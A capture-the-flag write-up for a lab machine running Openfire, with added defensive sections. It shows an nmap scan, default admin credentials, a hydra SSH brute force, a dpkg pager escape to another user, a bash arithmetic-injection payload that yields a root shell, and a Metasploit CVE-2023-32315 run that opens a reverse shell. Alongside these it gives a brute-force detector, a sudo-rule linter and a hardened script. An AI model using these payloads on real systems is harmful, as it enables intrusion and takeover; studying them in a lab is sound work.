CHOCOLATEFIRE MACHINE

 

 


First of all, we ping the target to confirm connectivity between the attacker machine and the vulnerable machine:

┌──(root㉿kali)-[/home/kali]
└─# ping -c 3 172.17.0.2
PING 172.17.0.2 (172.17.0.2) 56(84) bytes of data.
64 bytes from 172.17.0.2: icmp_seq=1 ttl=64 time=0.034 ms
64 bytes from 172.17.0.2: icmp_seq=2 ttl=64 time=0.074 ms
64 bytes from 172.17.0.2: icmp_seq=3 ttl=64 time=0.062 ms

--- 172.17.0.2 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2044ms
rtt min/avg/max/mdev = 0.034/0.056/0.074/0.016 ms

Once the host was reachable, Nmap was used to discover which services were running on the machine. Besides the Openfire XMPP ports, the scan showed port 9090 (HTTP, Jetty) and port 22 (SSH) open:

┌──(root㉿kali)-[/home/kali]
└─# nmap -n -Pn -p- --min-rate 5000 -sV -vvv 172.17.0.2 2>/dev/null
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-26 16:19 CET
NSE: Loaded 47 scripts for scanning.
Initiating ARP Ping Scan at 16:19
Scanning 172.17.0.2 [1 port]
Completed ARP Ping Scan at 16:19, 0.05s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 16:19
Scanning 172.17.0.2 [65535 ports]
Discovered open port 22/tcp on 172.17.0.2
Discovered open port 5262/tcp on 172.17.0.2
Discovered open port 5263/tcp on 172.17.0.2
Discovered open port 9090/tcp on 172.17.0.2
Discovered open port 5223/tcp on 172.17.0.2
Discovered open port 5275/tcp on 172.17.0.2
Discovered open port 5269/tcp on 172.17.0.2
Discovered open port 7777/tcp on 172.17.0.2
Discovered open port 5222/tcp on 172.17.0.2
Discovered open port 5270/tcp on 172.17.0.2
Discovered open port 5276/tcp on 172.17.0.2
Discovered open port 7070/tcp on 172.17.0.2

Completed SYN Stealth Scan at 16:19, 0.72s elapsed (65535 total ports)
Initiating Service scan at 16:19
Scanning 12 services on 172.17.0.2
Completed Service scan at 16:22, 156.28s elapsed (12 services on 1 host)
NSE: Script scanning 172.17.0.2.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 16:22
Completed NSE at 16:22, 7.03s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 16:22
Completed NSE at 16:22, 1.04s elapsed
Nmap scan report for 172.17.0.2
Host is up, received arp-response (0.0000040s latency).
Scanned at 2025-10-26 16:19:43 CET for 165s
Not shown: 65523 closed tcp ports (reset)
PORT     STATE SERVICE        REASON         VERSION
22/tcp   open  ssh            syn-ack ttl 64 OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
5222/tcp open  jabber         syn-ack ttl 64 Ignite Realtime Openfire Jabber server 3.10.0 or later
5223/tcp open  ssl/hpvirtgrp? syn-ack ttl 64
5262/tcp open  jabber         syn-ack ttl 64 Ignite Realtime Openfire Jabber server 3.10.0 or later
5263/tcp open  ssl/unknown    syn-ack ttl 64
5269/tcp open  xmpp           syn-ack ttl 64 Wildfire XMPP Client
5270/tcp open  xmp?           syn-ack ttl 64
5275/tcp open  jabber         syn-ack ttl 64
5276/tcp open  ssl/unknown    syn-ack ttl 64
7070/tcp open  http           syn-ack ttl 64 Jetty
7777/tcp open  socks5         syn-ack ttl 64 (No authentication; connection failed)
9090/tcp open  http           syn-ack ttl 64 Jetty

1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port5275-TCP:V=7.95%I=7%D=10/26%Time=68FE3C29%P=x86_64-pc-linux-gnu%r(R
SF:PCCheck,9B,"<stream:error\x20xmlns:stream=\"http://etherx\.jabber\.org/
SF:streams\"><not-well-formed\x20xmlns=\"urn:ietf:params:xml:ns:xmpp-strea
SF:ms\"/></stream:error></stream:stream>");
MAC Address: 02:42:AC:11:00:02 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 165.57 seconds
           Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)

Here we can try logging in to the Openfire admin console (port 9090) with the default credentials:

User: admin
Password: admin

With those we get access to the Openfire control panel.


Now that we have a username, we try to obtain its password by brute-forcing SSH with hydra and the rockyou.txt wordlist. The credentials turn out to be:

User: chocolatitochingon
Password: chocolate

┌──(root㉿kali)-[/home/kali]
└─# hydra -l chocolatitochingon -P /usr/share/wordlists/rockyou.txt ssh://172.17.0.2
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-10-26 16:37:51
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://172.17.0.2:22/
[22][ssh] host: 172.17.0.2   login: chocolatitochingon   password: chocolate
1 of 1 target successfully completed, 1 valid password found

[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-10-26                                     
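
The brute-force run above produces a burst of failed SSH logins from a single source, which is the signal a defender looks for in the sshd log. As an added example, not part of the original write-up, this bash function counts "Failed password" lines per source address in sshd log lines read from stdin and reports the addresses at or above a threshold; the log lines are constructed for the example and are not real logs from the lab.

```bash
#!/bin/bash
# Added example, not code from the original write-up: flag SSH brute-force
# sources in sshd auth-log lines. The sample lines below are constructed.

# ssh_bruteforce_sources [threshold]: reads sshd log lines on stdin and prints
# "ip count" for every source address with at least <threshold> failed
# password attempts (default 10), sorted by address.
ssh_bruteforce_sources() {
    local threshold="${1:-10}"
    awk -v thr="$threshold" '
        /sshd\[[0-9]+\]: Failed password for/ {
            # the source address is the field right after "from"
            for (i = 1; i <= NF; i++) if ($i == "from") fails[$(i+1)]++
        }
        END { for (ip in fails) if (fails[ip] >= thr) print ip, fails[ip] }
    ' | sort
}

# Constructed sample: 12 failures from one address (the shape hydra produces),
# one failure from a second address, and one successful login.
SAMPLE_AUTH_LOG=$(
    for n in $(seq 1 12); do
        echo "Oct 26 16:37:5$((n % 10)) d54443f4a3e5 sshd[10$n]: Failed password for chocolatitochingon from 172.17.0.1 port 4$n ssh2"
    done
    echo "Oct 26 16:38:01 d54443f4a3e5 sshd[1200]: Failed password for invalid user test from 192.0.2.9 port 50010 ssh2"
    echo "Oct 26 16:38:05 d54443f4a3e5 sshd[1201]: Accepted password for chocolatitochingon from 172.17.0.1 port 41000 ssh2"
)

# With the default threshold only the brute-forcing address is reported.
printf '%s\n' "$SAMPLE_AUTH_LOG" | ssh_bruteforce_sources 10
```

Hydra's own warning about parallel tasks points at the matching control on the server side: sshd's MaxStartups setting throttles concurrent unauthenticated connections, and blocking the addresses this function reports (fail2ban-style) closes the window further. The same rule, written against a log pipeline, is a standard SIEM detection.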

Now we connect via SSH:

┌──(root㉿kali)-[/home/kali]
└─# ssh chocolatitochingon@172.17.0.2 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@    WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED!     @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that a host key has just been changed.
The fingerprint for the ED25519 key sent by the remote host is
SHA256:srPJMJ55mxvWYy2CYtwvvGEQMp4zxtxrMEZho0IlaGU.
Please contact your system administrator.
Add correct host key in /root/.ssh/known_hosts to get rid of this message.
Offending ECDSA key in /root/.ssh/known_hosts:3
  remove with:
  ssh-keygen -f '/root/.ssh/known_hosts' -R '172.17.0.2'
Host key for 172.17.0.2 has changed and you have requested strict checking.
Host key verification failed.                           

SSH refuses the connection because the host key it now receives from 172.17.0.2 does not match the one stored in known_hosts from an earlier session. Since this is our own lab target, we remove the stale entry with the command OpenSSH suggests. Outside a lab, a changed host key should be verified out of band before the old entry is removed, because this warning is also exactly what a man-in-the-middle looks like.

┌──(root㉿kali)-[/home/kali]
└─# ssh-keygen -f '/root/.ssh/known_hosts' -R '172.17.0.2'
# Host 172.17.0.2 found: line 1
# Host 172.17.0.2 found: line 2
# Host 172.17.0.2 found: line 3
/root/.ssh/known_hosts updated.
Original contents retained as /root/.ssh/known_hosts.old

Now we connect via SSH again:

┌──(root㉿kali)-[/home/kali]
└─# ssh chocolatitochingon@172.17.0.2

The authenticity of host '172.17.0.2 (172.17.0.2)' can't be established.
ED25519 key fingerprint is SHA256:srPJMJ55mxvWYy2CYtwvvGEQMp4zxtxrMEZho0IlaGU.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '172.17.0.2' (ED25519) to the list of known hosts.
chocolatitochingon@172.17.0.2's password: 
Linux d54443f4a3e5 6.16.8+kali-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.16.8-1kali1 (2025-09-24) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jun 25 11:30:12 2024 from 172.17.0.1
chocolatitochingon@d54443f4a3e5:~$ sudo -l
Matching Defaults entries for chocolatitochingon on d54443f4a3e5:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

The output of sudo -l shows the privilege-escalation path: chocolatitochingon can run /usr/bin/dpkg as the user pinguinacio without a password.
User chocolatitochingon may run the following commands on d54443f4a3e5:
    (pinguinacio) NOPASSWD: /usr/bin/dpkg
chocolatitochingon@d54443f4a3e5:~$ 

Let's check GTFOBins for dpkg:

https://gtfobins.github.io/gtfobins/dpkg/#sudo

dpkg -l sends its listing through a pager (less by default), and at the pager prompt a ! followed by a command runs that command with the pager's privileges. So we run dpkg -l through sudo as pinguinacio and type !/bin/bash at the pager, which gives us a shell as that user:

chocolatitochingon@d54443f4a3e5:~$ sudo -u "pinguinacio" /usr/bin/dpkg -l
Desired=Unknown/Install/Remove/Purge/Hold
| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
||/ Name                     Version                      Architecture Description
+++-========================-============================-============-===========================================================
ii  adduser                  3.118                        all          add and remove users and groups
ii  apt                      2.2.4                        amd64        commandline package manager
ii  base-files               11.1+deb11u3                 amd64        Debian base system miscellaneous files
ii  base-passwd              3.5.51                       amd64        Debian base system master password and group files
ii  bash                     5.1-2+b3                     amd64        GNU Bourne Again SHell
ii  bsdutils                 1:2.36.1-8+deb11u1           amd64        basic utilities from 4.4BSD-Lite
ii  ca-certificates          20210119                     all          Common CA certificates
ii  coreutils                8.32-4+b1                    amd64        GNU core utilities
ii  dash                     0.5.11+git20200708+dd9ef66-5 amd64        POSIX-compliant shell
ii  dbus                     1.12.28-0+deb11u1            amd64        simple interprocess messaging system (daemon and utilities)
!/bin/bash

We are now the user pinguinacio, and we run sudo -l again:

pinguinacio@d54443f4a3e5:/home/chocolatitochingon$ sudo -l
Matching Defaults entries for pinguinacio on d54443f4a3e5:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User pinguinacio may run the following commands on d54443f4a3e5:
    (ALL) NOPASSWD: /bin/bash /home/pinguinacio/script.sh
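
Both sudo -l results in this write-up are rules a configuration audit can catch before anyone needs GTFOBins: a NOPASSWD rule for a binary that opens a pager, and a NOPASSWD rule that runs a script from a user's home directory as any user. As an added example (not code from the original post), this bash linter parses rules in the form sudo -l prints them and reports those patterns; the verdict names and the list of pager-capable binaries are my own choices, and the three rules fed to it at the end are the two from this lab plus a constructed benign one.

```bash
#!/bin/bash
# Added example, not part of the original write-up: a small linter for sudo
# rules in the form "sudo -l" prints them, "(runas) TAG: command [args]".
# It flags the two patterns this lab relies on; the binary list and the
# verdict names are my own choice.

# Binaries whose normal output goes through a pager or editor, from which a
# shell can be spawned (dpkg -l pipes through a pager, as shown above).
PAGER_ESCAPE_BINS="dpkg less more man vi vim nano"

# audit_sudo_rule "<rule>": prints one finding per line, or "ok" when none apply.
audit_sudo_rule() {
    local rule="$1" re runas tags cmd first rest bin target
    local findings=()
    # group 1: runas user, group 2: tag list such as "NOPASSWD: ", group 5: command
    re='^[[:space:]]*\(([^)]*)\)[[:space:]]*((([A-Z]+:)[[:space:]]*)*)(.*)$'
    if [[ ! "$rule" =~ $re ]]; then
        echo "unparsed"
        return 2
    fi
    runas="${BASH_REMATCH[1]}"
    tags="${BASH_REMATCH[2]}"
    cmd="${BASH_REMATCH[5]}"

    # The first word is the binary; when it is a shell interpreter, the script
    # given as its argument is what really runs with the elevated privileges.
    read -r first rest <<<"$cmd"
    bin="${first##*/}"
    target="$first"
    if { [ "$bin" = bash ] || [ "$bin" = sh ]; } && [ -n "$rest" ]; then
        target="${rest%% *}"
    fi

    if [[ "$tags" == *NOPASSWD:* ]]; then
        findings+=("nopasswd")
    fi
    for b in $PAGER_ESCAPE_BINS; do
        if [ "$bin" = "$b" ]; then
            findings+=("pager-escape:$bin")
        fi
    done
    # A script living under /home is normally writable by the user who owns it.
    if [[ "$target" == /home/* ]]; then
        findings+=("home-dir-script:$target")
    fi
    if [ "$runas" = ALL ]; then
        findings+=("runas-all")
    fi

    if [ "${#findings[@]}" -eq 0 ]; then
        echo "ok"
    else
        printf '%s\n' "${findings[@]}"
    fi
}

# The two rules found in this lab, plus a constructed benign one for comparison.
audit_sudo_rule '(pinguinacio) NOPASSWD: /usr/bin/dpkg'
audit_sudo_rule '(ALL) NOPASSWD: /bin/bash /home/pinguinacio/script.sh'
audit_sudo_rule '(root) /usr/bin/apt update'
```

The fix for both findings is the same in spirit: give sudo a fixed command line that cannot reach a shell (for example a wrapper script owned by root under /usr/local/sbin with no pager involved), and keep NOPASSWD for commands whose behaviour does not depend on user-supplied input.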

The script that pinguinacio can run as root through sudo, /home/pinguinacio/script.sh, contains the following:

#!/bin/bash

read -rp "Ingrese el número 1 para hacer un backup de tus archivos: " numero

if [[ "$numero" -eq 1 ]]
then
    echo "El número ingresado es igual a 1"
    echo "Intentando copiar archivos al directorio /opt..."
    cp * /opt
    echo "Copia completada."
else
    echo "El número ingresado no es igual a 1. No se realizará ninguna operación."
fi

The script hands whatever we type to [[ "$numero" -eq 1 ]]. Inside [[ ]], -eq evaluates both operands as arithmetic, and an array subscript in an operand is expanded first, including any $(...) it contains. So instead of a number we can supply an expression whose subscript runs a command, and because the script is executed through sudo that command runs as root:

a[$(whoami>&2)]+42
pinguinacio@d54443f4a3e5:~$ sudo /bin/bash /home/pinguinacio/script.sh
Ingrese el número 1 para hacer un backup de tus archivos: a[$(whoami>&2)]+42       
root

pinguinacio@d54443f4a3e5:~$ sudo /bin/bash /home/pinguinacio/script.sh
Ingrese el número 1 para hacer un backup de tus archivos: ^C
pinguinacio@d54443f4a3e5:~$ sudo /bin/bash /home/pinguinacio/script.sh
Ingrese el número 1 para hacer un backup de tus archivos: a[$(/bin/bash >&2)]+42  
root@d54443f4a3e5:/home/pinguinacio# pwd
/home/pinguinacio

Gotcha! We are now root, as shown below.
root@d54443f4a3e5:/home/pinguinacio# whoami
root
root@d54443f4a3e5:/home/pinguinacio# 
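
The root cause of the last step is the -eq test in script.sh. As an added example, not the lab's script, here is that comparison next to a hardened version that validates the input as digits before anything arithmetic happens; the inputs are constructed, and the injection string is the one from the walkthrough with a harmless stderr marker in place of a shell.

```bash
#!/bin/bash
# Added example, not the lab's script.sh: the unsafe numeric test from the
# script next to a hardened version, run on the same constructed inputs.

# Unsafe: inside [[ ... ]], -eq evaluates both operands as arithmetic
# expressions, so an array subscript containing $(...) in the operand
# executes that command during the comparison.
unsafe_is_one() {
    local numero="$1"
    if [[ "$numero" -eq 1 ]]; then echo yes; else echo no; fi
}

# Hardened: accept only a string of digits, reject everything else before any
# evaluation takes place, then compare the value with the test builtin
# (10# forces base 10 so leading zeros are not read as octal).
safe_is_one() {
    local numero="$1"
    if [[ ! "$numero" =~ ^[0-9]+$ ]]; then
        echo rejected
        return 1
    fi
    if [ "$((10#$numero))" -eq 1 ]; then echo yes; else echo no; fi
}

# Constructed injection input in the shape used in the walkthrough: the
# subscript runs a command (here it only writes a marker to stderr and then
# yields 0 as the index), and 0 + 42 is not 1, so the unsafe test prints "no"
# after the command has already executed.
INJECTION='a[$(echo INJECTED >&2; echo 0)]+42'
unsafe_is_one "$INJECTION"          # stdout: no    stderr: INJECTED
safe_is_one "$INJECTION" || true    # stdout: rejected, nothing is evaluated
```

The same applies to (( ... )), $(( ... )) and [ ... -eq ... ] inside [[ ]]: any arithmetic context that receives untrusted text must see only validated digits. With the validation in place, the sudo rule for script.sh no longer hands out a root shell, although a root-run "cp * /opt" from a user-controlled directory is still worth a second look.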

Automated process

This method is automated and easier than the manual one.

First of all, we open msfconsole and search for an Openfire exploit:
┌──(root㉿kali)-[/home/kali]
└─# msfconsole -q
msf > search exploit openfire

Matching Modules
================

   #  Name                                                        Disclosure Date  Rank       Check  Description
   -  ----                                                        ---------------  ----       -----  -----------
   0  exploit/multi/http/openfire_auth_bypass                     2008-11-10       excellent  Yes    Openfire Admin Console Authentication Bypass
   1    \_ target: Java Universal                                 .                .          .      .
   2    \_ target: Windows x86 (Native Payload)                   .                .          .      .
   3    \_ target: Linux x86 (Native Payload)                     .                .          .      .
   4  exploit/multi/http/openfire_auth_bypass_rce_cve_2023_32315  2023-05-26       excellent  Yes    Openfire authentication bypass with RCE plugin


Interact with a module by name or index. For example info 4, use 4 or use exploit/multi/http/openfire_auth_bypass_rce_cve_2023_32315

The steps are the following:

1. Run use 4 to select exploit/multi/http/openfire_auth_bypass_rce_cve_2023_32315.

2. Set the payload with set payload java/shell/reverse_tcp.

3. Run show options.

4. Set the address on which we receive the reverse connection with set LHOST 172.17.0.1.

5. Set the IP address of the vulnerable machine with set RHOST 172.17.0.2.

6. Run exploit to execute the module.

msf > use 4
[*] Using configured payload java/shell/reverse_tcp
msf exploit(multi/http/openfire_auth_bypass_rce_cve_2023_32315) > set payload java/shell/reverse_tcp 
payload => java/shell/reverse_tcp
msf exploit(multi/http/openfire_auth_bypass_rce_cve_2023_32315) > show options 

Module options (exploit/multi/http/openfire_auth_bypass_rce_cve_2023_32315):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   ADMINNAME                      no        Openfire admin user name, (default: random)
   PLUGINAUTHOR                   no        Openfire plugin author, (default: random)
   PLUGINDESC                     no        Openfire plugin description, (default: random)
   PLUGINNAME                     no        Openfire plugin base name, (default: random)
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies
                                            : sapni, socks4, http, socks5, socks5h
   RHOSTS                         yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basic
                                            s/using-metasploit.html
   RPORT         9090             yes       The target port (TCP)
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI     /                yes       The base path to the web application
   VHOST                          no        HTTP server virtual host

Payload options (java/shell/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Java Universal

View the full module info with the info, or info -d command.

msf exploit(multi/http/openfire_auth_bypass_rce_cve_2023_32315) > set LHOST 172.17.0.1
LHOST => 172.17.0.1
msf exploit(multi/http/openfire_auth_bypass_rce_cve_2023_32315) > set RHOST 172.17.0.2
RHOST => 172.17.0.2
msf exploit(multi/http/openfire_auth_bypass_rce_cve_2023_32315) > exploit 
[*] Started reverse TCP handler on 172.17.0.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Openfire version is 4.7.4
[*] Grabbing the cookies.
[*] JSESSIONID=node0u0y4ycjdrf05o0oijv8o86jp7.node0
[*] csrf=IKrSlD5XrB7e741
[*] Adding a new admin user.
[*] Logging in with admin user "dormpxjyluv" and password "VZTMa0bA".
[*] Upload and execute plugin "0oOg1A1aNKX0bpA" with payload "java/shell/reverse_tcp".
[*] Sending stage (2952 bytes) to 172.17.0.2
[!] Plugin "0oOg1A1aNKX0bpA" need manually clean-up via Openfire Admin console.
[!] Admin user "dormpxjyluv" need manually clean-up via Openfire Admin console.
[*] Command shell session 1 opened (172.17.0.1:4444 -> 172.17.0.2:59914) at 2025-10-26 17:11:22 +0100

help

Meta shell commands
===================

    Command     Description
    -------     -----------
    help        Help menu
    background  Backgrounds the current shell session
    sessions    Quickly switch to another session
    resource    Run a meta commands script stored in a local file
    shell       Spawn an interactive shell (*NIX Only)
    download    Download files
    upload      Upload files
    source      Run a shell script on remote machine (*NIX Only)
    irb         Open an interactive Ruby shell on the current session
    pry         Open the Pry debugger on the current session
    .<command>  Prefix any built-in command on this list with a '.' to execute in the underlying shell (ex: .help)

For more info on a specific command, use <command> -h or help <command>.

background

Background session 1? [y/N]  y
msf exploit(multi/http/openfire_auth_bypass_rce_cve_2023_32315) > sessions 

Active sessions
===============

  Id  Name  Type             Information  Connection
  --  ----  ----             -----------  ----------
  1         shell java/java               172.17.0.1:4444 -> 172.17.0.2:59914 (172.17.0.2)

msf exploit(multi/http/openfire_auth_bypass_rce_cve_2023_32315) > sessions -i 1
[*] Starting interaction with 1...

pwd
/mnt/openfire/bin
shell   
[*] Trying to find binary 'python' on the target machine
[-] python not found
[*] Trying to find binary 'python3' on the target machine
[-] python3 not found
[*] Trying to find binary 'script' on the target machine
[*] Found script at /usr/bin/script
[*] Using `script` to pop up an interactive shell
ls
ls
extra  openfire  openfire.sh  openfirectl
# whoami
whoami
root

Gotcha! We are the root user.

Thank you very much for reading this article.

I hope you liked it and learned something new.

This article has been written for ethical purposes.

Good Hack
 
